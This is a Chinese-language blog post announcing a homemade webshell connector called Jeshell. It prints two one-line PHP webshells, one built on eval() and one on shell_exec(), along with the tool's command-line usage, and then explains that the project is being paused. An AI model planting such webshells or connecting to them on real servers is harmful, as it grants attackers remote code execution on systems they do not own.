前言：
以前连接webshell都是用一个好朋友写的Webshellsniper，但是昨天使用webshellsniper测试的时候，发现不能支持shell_exec()这个php函数，问了一下才知道，他写的默认是只用eval()和assert()函数的webshell。于是，开始心血来潮，自己写了一个webshell的简单连接器。

Jeshell

github地址:Jeshell

项目描述：
一个webshell连接器，支持使用执行php代码函数的webshell，同时也支持执行命令行函数的webshell。
两种webshell的形式：

php:

<?php eval($_POST[c])?>

bash:

<?php echo shell_exec($_POST[c])?>

Paste_Image.png

• 使用格式：
  Usage: python getshell.py http://127.0.0.1/shell.php POST c

• 选项功能：
  quit | q 退出
  set 重新设置url,method,password等参数，如果直接回车则跳过对应项目，对其不做更改。
  back | b 后退
  help 显示帮助信息
  php 使用执行phpcode类型的函数，如eval()
  bash 使用执行bash命令的函数，如shell_exec()

使用截图：

Paste_Image.png

---

更新内容:

由于最近在深入了解朋友的webshellsniper之后，发现他实现的功能和考虑的东西比我想的深入多。突然感觉自己开发的东西没有了意义，继续完善的话也不过是在重复劳动。因此，我要暂停这个项目，转而去帮他完善他的webshellsniper的功能，最近添加了一个上传脚本文件的功能，由于在测试中，因此暂时还没公开。
在此推荐他的github开源项目：
Webshell-Sniper：https://github.com/WangYihang/Webshell-Sniper
作者：WangYihang
此外，最近在准备开发一个新的项目，至于具体是什么，到时候会更新。

经验总结：

由于上一次开发Jshell的时候，没有进行一个事先的产品规划和设计，都是想到什么功能就添加什么功能，导致许多代码要去重复修改，所用的数据结构也进行了修改，导致开发的效率不高。
这一次开发新的产品，我想要事先做好一个比较完整的策划，之后再将其实现，最后会在github上开源，请拭目以待。